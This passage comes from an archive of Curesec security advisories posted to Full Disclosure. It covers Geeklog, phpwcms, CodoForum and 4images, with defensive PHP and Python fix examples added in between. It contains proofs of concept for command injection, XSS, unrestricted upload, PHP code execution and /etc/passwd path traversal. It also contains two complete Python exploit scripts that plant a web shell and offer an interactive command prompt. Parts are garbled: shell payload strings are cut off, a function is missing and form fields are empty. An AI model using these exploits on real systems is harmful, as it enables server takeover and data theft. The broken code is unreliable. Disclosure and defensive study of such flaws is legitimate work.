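function build_backup_command(string $dbName, string $backupPath, string $mask, int $timestamp): string
{
    if (!validate_filename_mask($mask)) {
        throw new InvalidArgumentException("backup file name mask '$mask' contains disallowed characters");
    }
    $backupFile = rtrim($backupPath, '/') . '/' . expand_filename_mask($mask, $timestamp);
    return 'mysqldump ' . escapeshellarg($dbName) . ' > ' . escapeshellarg($backupFile);
}

// --- Demonstration with constructed values ------------------------------------
$ts = mktime(12, 30, 45, 12, 2, 2015);

// The documented mask produces a plain file name inside the backup directory.
echo build_backup_command('geeklog', '/var/backups/geeklog',
    'geeklog_db_backup_%Y_%m_%d_%H_%M_%S.sql', $ts), PHP_EOL;

// A mask carrying shell metacharacters, as in the advisory, is refused before
// any command string exists.
try {
    build_backup_command('geeklog', '/var/backups/geeklog', 'backup.sql";echo injected;"', $ts);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}

// Defense in depth: even an unvalidated value stays inside one quoted argument.
echo escapeshellarg('backup.sql";echo injected;"'), PHP_EOL;
```

The same escaping applies to the host, user and password options that precede the database name in the real command; a configuration value that only admins can set is still attacker-influenced once an admin account or a CSRF-able form is in play. Running the validation at configuration time as well means a hostile mask is never persisted.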

5. Solution

To mitigate this issue please upgrade at least to version 2.1.1b3:

https://www.geeklog.net/filemgmt/visit.php/1156

Please note that a newer version might already be available.

6. Report Timeline

09/29/2015 Informed Vendor about Issue (no reply)
10/21/2015 Reminded Vendor of Disclosure Date
10/21/2015 Vendor asks for an additional two weeks for testing
11/17/2015 CVE Requested (no reply)
11/17/2015 Reminded Vendor of disclosure date
11/17/2015 Vendor points to beta version and announces release
11/24/2015 Informed Vendor of insufficient fix in beta
11/30/2015 Vendor releases fix
12/02/2015 Disclosed to public


Blog Reference:
https://blog.curesec.com/article/blog/Geeklog-210-Code-Execution-119.html
 
--
blog:  https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] Geeklog 2.1.0: Code Execution Exploit

2015-12-09 Thread Curesec Research Team (CRT)

#!/usr/local/bin/python
# Exploit for geeklog-2.1.0 OS Command Injection vulnerability
# An admin account is required to use this exploit
# Curesec GmbH

import sys
import re
import argparse
import requests # requires requests lib

parser = argparse.ArgumentParser()
parser.add_argument("url", help="base url to vulnerable site")
parser.add_argument("username", help="admin username")
parser.add_argument("password", help="admin password")
args = parser.parse_args()

url = args.url
username = args.username
password = args.password

loginPath = "/admin/moderation.php"
configPath = "/admin/configuration.php?tab-5"
backupPath = "/admin/database.php"

shellFileName = "404.php"
shellContent = "', 
csrfRequest.text)
return csrfTokenRegEx.group(1)

def injectCommand(requestSession, url):
csrfToken = getCSRFToken(requestSession, url)
postData = {"_glsectoken": csrfToken, "conf_group": "Core", "sub_group": 
"0", "form_submit": "true", "mysqldump_filename_mask": 
'geeklog_db_backup_%Y_%m_%d_%H_%M_%S.sql";echo "' + shellContent + '" > ' + 
shellFileName + ';"'}
requestSession.post(url, data = postData)

def executeCommand(requestSession, url):
csrfToken = getCSRFToken(requestSession, url)

requestSession.get(url + "?mode=backup&_glsectoken=" + csrfToken)

def runShell(url):
print("enter command, or enter exit to quit.")
command = raw_input("$ ")
while "exit" not in command:
print(requests.get(url + command).text)
command = raw_input("$ ")

requestSession = requests.session()

if login(requestSession, url + loginPath, username, password):
print("successful: login")
else:
exit("ERROR: could not log in")

print("injecting command")
injectCommand(requestSession, url + configPath)

print("executing command")
executeCommand(requestSession, url + backupPath)

runShell(url + "/admin/" + shellFileName + "?x=")


Blog Reference:
https://blog.curesec.com/article/blog/Geeklog-210-Code-Execution-Exploit-120.html
 
--
blog:  https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] Geeklog 2.1.0: XSS

2015-12-09 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:Geeklog 2.1.0
Fixed in:2.1.1b3
Fixed Version Link:  https://www.geeklog.net/filemgmt/visit.php/1156
Vendor Contact:  geeklog-secur...@lists.geeklog.net
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  09/29/2015
Disclosed to public: 12/02/2015
Release mode:Coordinated release
CVE: requested, but not assigned
Credits  Tim Coen of Curesec GmbH

2. Vulnerability Description

CVSS

Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N

Description

There is at least one XSS vulnerability in the installation script of Geeklog.

Geeklog recommends deleting the install directory and displays warnings in the
admin area if it is still present. However, deleting the install directory is
not mandatory, so it should be assumed that not all users will delete it.

3. Proof of Concept


http://localhost/geeklog-2.1.0/public_html/admin/install/bigdump.php?foffset=1&start=1&fn=tealert(1)st.sql

$_REQUEST['site_url'], $_REQUEST['site_admin_url'], and $_SERVER['PHP_SELF']
may be vulnerable as well, but the attacker would need a valid sql backup file
to trigger them.

4. Solution

To mitigate this issue please upgrade at least to version 2.1.1b3:

https://www.geeklog.net/filemgmt/visit.php/1156

Please note that a newer version might already be available.

5. Report Timeline

09/29/2015 Informed Vendor about Issue (no reply)
10/21/2015 Reminded Vendor of Disclosure Date
10/21/2015 Vendor asks for an additional two weeks for testing
11/17/2015 CVE Requested (no reply)
11/30/2015 Vendor releases fix
12/02/2015 Disclosed to public


Blog Reference:
https://blog.curesec.com/article/blog/Geeklog-210-XSS-121.html
 
--
blog:  https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] phpwcms 1.7.9: Code Execution

2015-12-09 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    phpwcms 1.7.9
Fixed in:            1.8.0 RC1
Fixed Version Link:  https://github.com/slackero/phpwcms/archive/phpwcms-1.8.0-RC1.zip
Vendor Website:      http://www.phpwcms.de/
Vulnerability Type:  Code Execution
Remote Exploitable:  Yes
Reported to vendor:  09/29/2015
Disclosed to public: 12/02/2015
Release mode:        Coordinated release
CVE:                 requested, but not assigned
Credits              Tim Coen of Curesec GmbH

2. Overview

phpwcms allows the upload of files with dangerous type, which leads to code
execution. Additionally, it allows registered users who are not admins to use
PHP tags, which also leads to code execution.

Please note that a user account is needed to upload files. The user does not
need administration rights, but there is no open registration by default (the
form to add users is however open to CSRF).

3. Unrestricted Upload of File with Dangerous Type

CVSS

High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description

When uploading files, there are no checks as to the type or extension of the
file.

When uploading single files, these are stored inside the "filearchive"
directory. The original file name is changed to the hash of the file name. The
directory is protected with a .htaccess file from accessing or executing files
directly. Because of this, uploading single files cannot easily be exploited;
it may however be possible to execute them via include_int_php (see below).

However, when uploading multiple files, these are stored temporarily inside the
"upload" directory, and these files are not renamed. The "upload" directory is
also protected by an .htaccess file, but as .htaccess files can be uploaded, it
can be overwritten, thus leading to code execution.

Please note that a user account is needed to upload files. The user does not
need administration rights, but there is no open registration by default.

Proof of Concept


Upload a .htaccess file and a PHP file here:
http://localhost/phpwcms-phpwcms-1.7.9/phpwcms.php?do=files&p=8

The .htaccess file should contain:
allow from all

Now the uploaded PHP file can be accessed and executed:
http://localhost/phpwcms-phpwcms-1.7.9/upload/shell.php?x=id
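Three advisories on this page describe upload checks that fail in different ways: redaxscript 2.5.0 trusts exif_imagetype(), which only reads the first bytes; Geeklog 2.1.0 checks the type only in the browser; phpwcms 1.7.9 checks nothing and lets a .htaccess file be replaced. The following is an added example, not code from any of those projects, of a server-side validator that would have rejected all three: an extension allowlist (which also excludes .htaccess), libmagic content sniffing that must agree with the extension, a full decode with GD, and storage under a server-chosen random name after re-encoding, which drops bytes appended after the image data. Function names and the constructed files are assumptions for this demonstration; ext-fileinfo, ext-gd and PHP 8 are assumed.

```php
<?php
// Added example (not redaxscript, Geeklog or phpwcms code): server-side image
// upload handling that relies neither on the client nor on the first bytes of
// the file. Requires ext-fileinfo and ext-gd. Function names and the constructed
// files are assumptions made for this demonstration.
declare(strict_types=1);

// Extension allowlist with the content type each one must carry.
const ALLOWED_IMAGE_TYPES = [
    'png'  => 'image/png',
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'gif'  => 'image/gif',
];

/** Returns null when the upload is acceptable, otherwise the reason it is not. */
function validate_image_upload(string $clientName, string $bytes): ?string
{
    // 1. Extension allowlist: .php, .phtml and .htaccess never get past here.
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!isset(ALLOWED_IMAGE_TYPES[$ext])) {
        return "extension '$ext' is not an allowed image type";
    }
    // 2. Content sniffing by libmagic must agree with the claimed extension.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->buffer($bytes);
    if ($mime !== ALLOWED_IMAGE_TYPES[$ext]) {
        return "content type '$mime' does not match extension '$ext'";
    }
    // 3. exif_imagetype() only reads the header; require a full decode instead.
    $img = @imagecreatefromstring($bytes);
    if ($img === false) {
        return 'file does not decode as an image';
    }
    imagedestroy($img);
    return null;
}

/**
 * Store an accepted upload under a server-chosen random name with a fixed
 * extension, re-encoded through GD so that bytes appended after the image data
 * (the "valid header, hostile tail" pattern) are never written to disk.
 */
function store_image(string $clientName, string $bytes, string $dir): string
{
    $problem = validate_image_upload($clientName, $bytes);
    if ($problem !== null) {
        throw new RuntimeException($problem);
    }
    $img  = imagecreatefromstring($bytes);
    $path = rtrim($dir, '/') . '/' . bin2hex(random_bytes(16)) . '.png';
    imagepng($img, $path);
    imagedestroy($img);
    return $path;
}

// --- Demonstration with constructed inputs ------------------------------------
$im = imagecreatetruecolor(2, 2);
ob_start();
imagepng($im);
$png = ob_get_clean();           // a genuine 2x2 PNG built in memory
imagedestroy($im);

$cases = [
    ['shell.php', $png],                                // bad extension, good content
    ['.htaccess', "allow from all\n"],                  // phpwcms-style override attempt
    ['photo.png', "plain text, not an image\n"],        // good extension, not an image
    ['photo.png', $png . 'TRAILING-JUNK-AFTER-IEND'],   // valid image, extra tail
];
foreach ($cases as [$name, $bytes]) {
    $verdict = validate_image_upload($name, $bytes);
    printf("%-10s %s\n", $name, $verdict ?? 'accepted');
}

// The last case passes validation, but re-encoding drops the appended tail.
$stored = store_image('photo.png', $png . 'TRAILING-JUNK-AFTER-IEND', sys_get_temp_dir());
printf("stored as %s, tail preserved: %s\n",
    basename($stored),
    str_contains(file_get_contents($stored), 'TRAILING-JUNK') ? 'yes' : 'no');
unlink($stored);
```

The random server-side name also neutralises double extensions such as shell.php.png and makes the original name irrelevant to the web server's handler selection; keeping the upload directory outside the document root, or served with PHP execution disabled, is the second layer that the phpwcms .htaccess case shows should not be overwritable from the application.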

4. Code Execution

CVSS

High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description

The functions include_int_php, include_int_phpcode, and include_ext_php can all
be used to gain code execution. These functions can be used by any logged in
user, admin rights are not required.

Proof of Concept


Create a new article. As author, use
[PHP] passthru("touch mynewtest.php") [/PHP]

Visiting
http://localhost/phpwcms-phpwcms-1.7.9/feeds.php
is one of the ways to trigger the code execution.

Please note that the feed is by default cached for one hour, during which the
code would not be executed as the cache is loaded instead.

The vulnerable functions are used in other places as well, which means an
attacker may not have to wait an hour for the cache to clear by triggering the
code elsewhere.

5. Solution

To mitigate this issue please upgrade at least to version 1.8.0 RC1:

https://github.com/slackero/phpwcms/archive/phpwcms-1.8.0-RC1.zip

Please note that a newer version might already be available.

6. Report Timeline

09/29/2015 Informed Vendor about Issue
09/29/2015 Vendor confirmed issues
10/21/2015 Reminded Vendor of Disclosure Date
10/25/2015 Vendor requests more time
11/17/2015 CVE Requested (no reply)
11/24/2015 Reminded Vendor of Disclosure Date
11/29/2015 Vendor releases fix
12/02/2015 Disclosed to public


Blog Reference:
https://blog.curesec.com/article/blog/phpwcms-179-Code-Execution-122.html
 
--
blog:  https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] phpwcms 1.7.9: CSRF

2015-12-09 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:    phpwcms 1.7.9
Fixed in:            1.8.0 RC1
Fixed Version Link:  https://github.com/slackero/phpwcms/archive/phpwcms-1.8.0-RC1.zip
Vendor Website:      http://www.phpwcms.de/
Vulnerability Type:  CSRF
Remote Exploitable:  Yes
Reported to vendor:  09/29/2015
Disclosed to public: 12/02/2015
Release mode:        Coordinated release
CVE:                 requested, but not assigned
Credits              Tim Coen of Curesec GmbH

2. Vulnerability Description

CVSS

Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P

Description

There is no CSRF protection for any forms, which means that an attacker can
perform any action a victim can perform, if the victim visits an attacker
controlled website while logged in. In the case of phpwcms, an attacker can add
an admin user and thus gain code execution.
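Both this advisory and the appRain 4.0.3 CSRF advisory earlier on this page describe forms that accept any POST carrying the victim's session cookie. The following is an added example, not phpwcms's or appRain's own code, of the synchronizer-token check that closes that gap: a per-session random token is embedded in every state-changing form and compared in constant time on submission, and state changes are refused over GET. The function names, the `_csrf` field name, the session array and the constructed requests are assumptions made for this demonstration.

```php
<?php
// Added example (not appRain or phpwcms code): synchronizer-token CSRF protection
// for a state-changing handler such as "add admin user". Function names, the
// _csrf field name and the sample requests below are constructed for this demo.
declare(strict_types=1);

const CSRF_SESSION_KEY = '_csrf_token';

/** Per-session token, created from the CSPRNG on first use and reused afterwards. */
function csrf_token(array &$session): string
{
    if (empty($session[CSRF_SESSION_KEY])) {
        $session[CSRF_SESSION_KEY] = bin2hex(random_bytes(32));
    }
    return $session[CSRF_SESSION_KEY];
}

/** Hidden field to embed in every form that changes state. */
function csrf_field(array &$session): string
{
    $token = htmlspecialchars(csrf_token($session), ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="hidden" name="_csrf" value="' . $token . '">';
}

/**
 * True only for a POST whose _csrf field equals the session token. A form on an
 * attacker-controlled site is submitted with the victim's cookies, but the
 * attacker cannot read the token out of the victim's session, so it fails here.
 */
function csrf_valid(array $session, string $method, array $post): bool
{
    if ($method !== 'POST') {
        return false; // state changes over GET are triggerable by <img src=...>
    }
    $expected = $session[CSRF_SESSION_KEY] ?? '';
    $given    = $post['_csrf'] ?? '';
    if ($expected === '' || !is_string($given)) {
        return false;
    }
    return hash_equals($expected, $given); // constant-time comparison
}

/** Handler skeleton: refuse the request before any of its fields are acted on. */
function handle_add_user(array $session, string $method, array $post): string
{
    if (!csrf_valid($session, $method, $post)) {
        return 'rejected: missing or wrong CSRF token';
    }
    return 'accepted: would create user ' . ($post['username'] ?? '?');
}

// --- Demonstration with constructed requests ---------------------------------
$session = [];                      // stands in for $_SESSION
$token   = csrf_token($session);
echo csrf_field($session), PHP_EOL; // what the legitimate form would contain

// 1. Forged post like the advisory PoC: cookies are sent, the token is not.
$forged = ['username' => 'attacker', 'role' => 'admin'];
echo handle_add_user($session, 'POST', $forged), PHP_EOL;

// 2. Legitimate post: the form rendered with csrf_field() sends the token back.
$legit = $forged + ['_csrf' => $token];
echo handle_add_user($session, 'POST', $legit), PHP_EOL;

// 3. Token replayed over GET is still refused.
echo handle_add_user($session, 'GET', $legit), PHP_EOL;

// 4. A guessed token is refused, and the comparison leaks no timing information.
echo handle_add_user($session, 'POST', $forged + ['_csrf' => str_repeat('0', 64)]), PHP_EOL;
```

The token must be tied to the session and never derived from predictable data; an XSS bug on the same origin still defeats it, which is why the XSS advisories on this page mention "bypassing of CSRF protection". Setting the session cookie with SameSite=Lax and checking the Origin header on POSTs are cheap additional layers, and the protection must be on by default rather than shipped as an optional module.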

3. Proof of Concept

Add Admin User:



  
http://localhost/phpwcms-phpwcms-1.7.9/phpwcms.php?do=admin&s=1"; 
method="POST">
  
  
  
  
  
  
  
  
  
  
  

  


4. Solution

To mitigate this issue please upgrade at least to version 1.8.0 RC1:

https://github.com/slackero/phpwcms/archive/phpwcms-1.8.0-RC1.zip

Please note that a newer version might already be available.

5. Report Timeline

09/29/2015 Informed Vendor about Issue
09/29/2015 Vendor confirmed issues
10/21/2015 Reminded Vendor of Disclosure Date
10/25/2015 Vendor requests more time
11/17/2015 CVE Requested (no reply)
11/24/2015 Reminded Vendor of Disclosure Date
11/29/2015 Vendor releases fix
12/02/2015 Disclosed to public


Blog Reference:
https://blog.curesec.com/article/blog/phpwcms-179-CSRF-123.html
 
--
blog:  https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] CodoForum 3.4: XSS

2015-12-09 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:CodoForum 3.4
Fixed in:not fixed
Fixed Version Link:  n/a
Vendor Contact:  ad...@codologic.com
Vulnerability Type:  XSS
Remote Exploitable:  Yes
Reported to vendor:  09/01/2015
Disclosed to public: 12/02/2015
Release mode:Full Disclosure
CVE: Requested, but not assigned
Credits  Tim Coen of Curesec GmbH

2. Vulnerability Description

There is an XSS vulnerability in CodoForum 3.4. With this, it is possible to
steal cookies, bypass CSRF protection, or inject JavaScript keyloggers.

The HybridAuth 2.1.2 Install script is vulnerable to XSS attacks. In version
3.4, CodoForum did update HybridAuth to the latest version, but kept the old
version in a folder called hybridauthold.

3. Proof of Concept


http://localhost/codoforum/sys/Ext/hybridauthold/install.php/";>alert(1)
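The XSS advisories on this page (appRain's file-manager search and appeditor, redaxscript's comment attribute, Geeklog's install script and the HybridAuth install.php here) all echo input into HTML without encoding, and the redaxscript timeline shows why a denylist of attribute names is not a fix. The following is an added example, not code from any of those projects, of contextual output encoding for the three reflection points involved: a value inside a double-quoted attribute, element text, and the script's own URL. The `e()`, `safe_url()` and `render_*()` names, the sample payloads and the DOM-based check are constructed for this demonstration; ext-dom and PHP 8 are assumed.

```php
<?php
// Added example (not appRain, redaxscript, Geeklog or CodoForum code): contextual
// output encoding for values reflected into attributes, text and a form action,
// plus a DOM parse that shows the encoded input never becomes an attribute.
// Function names and sample inputs are constructed for this demonstration.
declare(strict_types=1);

/** Encoding for HTML text nodes and double-quoted attribute values. */
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
}

/** URL attribute: only http(s) or site-relative targets; anything else becomes "#". */
function safe_url(string $url): string
{
    return preg_match('#^(https?://|/(?!/))#i', $url) === 1 ? e($url) : '#';
}

/** Search box in the style of the toolbar: the term lands inside value="". */
function render_search_box(string $srcstr): string
{
    return '<input type="text" name="srcstr" value="' . e($srcstr) . '">';
}

/** Sidebar comment link: the comment is both an attribute value and the link text. */
function render_comment_link(string $comment, string $url): string
{
    return '<a href="' . safe_url($url) . '" title="' . e($comment) . '">' . e($comment) . '</a>';
}

/**
 * Form action. $_SERVER['PHP_SELF'] includes attacker-controlled path info
 * (install.php/"><script>...), so use the fixed script name and still encode it.
 */
function render_form_action(string $scriptName): string
{
    return '<form action="' . e($scriptName) . '" method="post"></form>';
}

/** Parse a rendered fragment and return the attribute names of its first element. */
function element_attributes(string $html): array
{
    $doc = new DOMDocument();
    $doc->loadHTML('<!DOCTYPE html><html><body>' . $html . '</body></html>', LIBXML_NOERROR);
    $el = $doc->getElementsByTagName('body')->item(0)->firstChild;
    $names = [];
    foreach ($el->attributes as $attr) {
        $names[] = $attr->name;
    }
    return $names;
}

// --- Demonstration with constructed payloads -----------------------------------
$payloads = [
    'comment" onmouseover=alert(1) foo="',          // attribute break-out, as in redaxscript
    '"><script>alert(1)</script>',                  // tag break-out, as in the other reports
    "' style=\"x:expression(alert(1))\" a='",       // style attribute, the partial-fix case
];
foreach ($payloads as $p) {
    $html = render_comment_link($p, '/comments/42');
    echo $html, PHP_EOL;
    echo '  parsed attributes: ', implode(',', element_attributes($html)), PHP_EOL;
}

$box = render_search_box('"><script>alert(1)</script>');
echo $box, PHP_EOL, '  parsed attributes: ', implode(',', element_attributes($box)), PHP_EOL;

echo render_form_action('/sys/Ext/hybridauth/install.php'), PHP_EOL;
echo render_comment_link('click', 'javascript:alert(1)'), PHP_EOL;  // href is replaced by "#"
```

Encoding at the output point makes the attribute-name denylist that redaxscript's first fix relied on unnecessary: whether the payload tries onmouseover, style or a closing tag, it is rendered as literal text and the parsed element keeps only the attributes the template emitted. A Content-Security-Policy without unsafe-inline is the defence-in-depth layer for the cases a template misses.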

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

09/01/2015 Informed Vendor about Issue (no reply)
09/22/2015 Reminded Vendor of disclosure date
09/23/2015 Vendor requests clarification
09/23/2015 Clarified Issue
09/29/2015 Reminded Vendor of disclosure date
09/29/2015 Vendor requests more time
09/29/2015 Set new disclosure date
11/03/2015 Reminded Vendor of disclosure date (no reply)
11/17/2015 CVE Requested (no reply)
12/02/2015 Disclosed to public


Blog Reference:
https://blog.curesec.com/article/blog/CodoForum-34-XSS-62.html
 
--
blog:  https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] 4images 1.7.11: Code Execution

2015-12-09 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:4images 1.7.11
Fixed in:1.7.12
Fixed Version Link:  http://www.4homepages.de/download-4images
Vendor Website:  http://www.4homepages.de/
Vulnerability Type:  Code Execution
Remote Exploitable:  Yes
Reported to vendor:  09/29/2015
Disclosed to public: 11/04/2015
Release mode:Coordinated release
CVE: Requested, but not assigned
Credits  Tim Coen of Curesec GmbH

2. Vulnerability Description

CVSS

High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C

Description

4images comes with an HTML template editor which allows the editing of HTML
files. It will also create a new file if the passed file name does not already
exist. When doing this, it does not check that the extension of the passed file
is .html.

Admin credentials are required to use the HTML template editor.

3. Proof of Concept


POST /4images/admin/templates.php HTTP/1.1


__csrf=28a9a05b480c3f8ed326523b1ce7532c&action=savetemplate&content=%s", 
$lang['template_edit_error']);
}
  }
  $action = "modifytemplates";
}

5. Solution

To mitigate this issue please upgrade at least to version 1.7.12:

http://www.4homepages.de/download-4images

Please note that a newer version might already be available.

6. Report Timeline

09/29/2015 Informed Vendor about Issue
10/21/2015 Reminded Vendor of Disclosure Date
11/03/2015 Vendor releases fix
11/17/2015 CVE Requested (no reply)
12/02/2015 Disclosed to public


Blog Reference:
https://blog.curesec.com/article/blog/4images-1711-Code-Execution-105.html
 
--
blog:  https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] 4images 1.7.11: Code Execution Exploit

2015-12-09 Thread Curesec Research Team (CRT)

#!/usr/local/bin/python
# Exploit for 4images 1.7.11 Code Execution vulnerability
# An admin account is required to use this exploit
# Curesec GmbH

import sys
import re
import argparse
import requests # requires requests lib

parser = argparse.ArgumentParser()
parser.add_argument("url", help="base url to vulnerable site")
parser.add_argument("username", help="admin username")
parser.add_argument("password", help="admin password")
args = parser.parse_args()

url = args.url
username = args.username
password = args.password

loginPath = "/admin/index.php"
fileManagerPath = "/admin/templates.php"

shellFileName = "404.php"
shellContent = ""

def login(requestSession, url, username, password):
csrfRequest = requestSession.get(url)
csrfTokenRegEx = re.search('name="__csrf" value="(.*)" />', 
csrfRequest.text)
csrfToken = csrfTokenRegEx.group(1)

postData = {"action": "login", "redirect": ".%2F..%2Fadmin%2Findex.php", 
"__csrf": csrfToken, "loginusername": username, "loginpassword": password}
loginResult = requestSession.post(url, data = postData).text
return "loginpassword" not in loginResult

def upload(requestSession, url, fileName, fileContent):
csrfRequest = requestSession.get(url)
csrfTokenRegEx = re.search('name="__csrf" value="(.*)" />', 
csrfRequest.text)
csrfToken = csrfTokenRegEx.group(1)

postData = {"action": "savetemplate", "content": fileContent, 
"template_file_name": fileName, "__csrf": csrfToken, "template_folder": 
"default"}
loginResult = requestSession.post(url, data = postData).text

def runShell(url):
print("enter command, or enter exit to quit.")
command = raw_input("$ ")
while "exit" not in command:
print(requests.get(url + command).text)
command = raw_input("$ ")

requestSession = requests.session()

if login(requestSession, url + loginPath, username, password):
print("successful: login")
else:
exit("ERROR: Incorrect username or password")

upload(requestSession, url + fileManagerPath, shellFileName, shellContent)

runShell(url + "/templates/default/" + shellFileName + "?x=")


Blog Reference:
https://blog.curesec.com/article/blog/4images-1711-Code-Execution-Exploit-117.html
 
--
blog:  https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] 4images 1.7.11: Path Traversal

2015-12-09 Thread Curesec Research Team (CRT)
Security Advisory - Curesec Research Team

1. Introduction

Affected Product:4images 1.7.11
Fixed in:1.7.12
Fixed Version Link:  http://www.4homepages.de/download-4images
Vendor Website:  http://www.4homepages.de/
Vulnerability Type:  Path Traversal
Remote Exploitable:  Yes
Reported to vendor:  09/29/2015
Disclosed to public: 12/02/2015
Release mode:Coordinated release
CVE: Requested, but not assigned
Credits  Tim Coen of Curesec GmbH

2. Vulnerability Description

CVSS

Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N

Description

When downloading or displaying a backup file, the file parameter is vulnerable
to directory traversal. This is the case because the get_basefile function
contains a bug: when the passed path name ends with a slash, it returns the
entire path instead of the file name.

By adding ?/ to the file name, an attacker can thus download or display
arbitrary files.

Admin credentials are required to view or download backup files.

3. Proof of Concept


GET 
/4images/admin/backup.php?action=downloadbackup&file=../../../../../../etc/passwd?/
 HTTP/1.1
GET 
/4images/admin/backup.php?action=showbackup&file=../../../../../../etc/passwd?/ 
HTTP/1.1

4. Code


/admin/backup.php
if (isset($HTTP_GET_VARS['file']) || isset($HTTP_POST_VARS['file'])) {
  $file = (isset($HTTP_GET_VARS['file'])) ? 
get_basefile(trim($HTTP_GET_VARS['file'])) : 
get_basefile(trim($HTTP_POST_VARS['file']));
}
else {
  $file = "";
}

if ($action == "downloadbackup") {
  $size = @filesize(ROOT_PATH.DATABASE_DIR."/".$file);
  header("Content-type: application/x-unknown");
  header("Content-length: $size\n");
  header("Content-Disposition: attachment; filename=$file\n");
  readfile(ROOT_PATH.DATABASE_DIR."/".$file);
  exit;
}

/includes/functions.php
function get_basename($path) {
  $path = str_replace("\\", "/", $path);
  $name = substr(strrchr($path, "/"), 1);
  return $name ? $name : $path;
}

function get_basefile($path) {
  $basename = get_basename($path);
  preg_match("#(.+)\?(.+)#", $basename, $regs);
  return isset($regs[1]) ? $regs[1] : $basename;
}
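To make the interaction of the two functions concrete, here is an added example (a Python port of the PHP above, not 4images code) that reproduces the behaviour and puts one possible strict replacement next to it. The replacement is an assumption about how a fix can look and is not the vendor's 1.7.12 patch; traversal_payload() only builds the payload shape used in the proof of concept.

```python
import re
from typing import Optional

# --- Port of 4images 1.7.11 /includes/functions.php (vulnerable) -----------

def get_basename_vuln(path: str) -> str:
    """PHP: $name = substr(strrchr($path, "/"), 1); return $name ? $name : $path;"""
    path = path.replace("\\", "/")
    idx = path.rfind("/")
    name = path[idx + 1:] if idx != -1 else ""
    # The fallback is the bug: a path that ENDS with "/" yields an empty
    # $name, so the whole path, traversal included, is returned unchanged.
    return name if name else path

def get_basefile_vuln(path: str) -> str:
    """PHP: preg_match("#(.+)\\?(.+)#", $basename, $regs);
            return isset($regs[1]) ? $regs[1] : $basename;"""
    basename = get_basename_vuln(path)
    m = re.search(r"(.+)\?(.+)", basename)
    # Greedy (.+) runs to the last "?", so the trailing "?/" is cut off here
    # and "../../../../../../etc/passwd" is what readfile() receives.
    return m.group(1) if m else basename

# --- One possible hardened replacement (assumption, not the vendor fix) -----

SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]*$")

def get_basefile_fixed(path: str) -> Optional[str]:
    """Drop any ?query first, then accept only a plain file name: no path
    separators and no leading dot, so '..' and '/etc/passwd' cannot pass."""
    name = path.split("?", 1)[0]
    if "/" in name or "\\" in name or not SAFE_NAME.match(name):
        return None
    return name

def traversal_payload(depth: int = 6, target: str = "etc/passwd") -> str:
    """Build the advisory's payload shape: '../' repeated, target, then '?/'."""
    return "../" * depth + target + "?/"
```

Run get_basefile_vuln(traversal_payload()) to see the traversal string survive both functions; the fixed variant returns None for it and still accepts a plain backup file name with a ?query suffix.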

5. Solution

To mitigate this issue please upgrade at least to version 1.7.12:

http://www.4homepages.de/download-4images

Please note that a newer version might already be available.

6. Report Timeline

09/29/2015 Informed Vendor about Issue
10/21/2015 Reminded Vendor of Disclosure Date
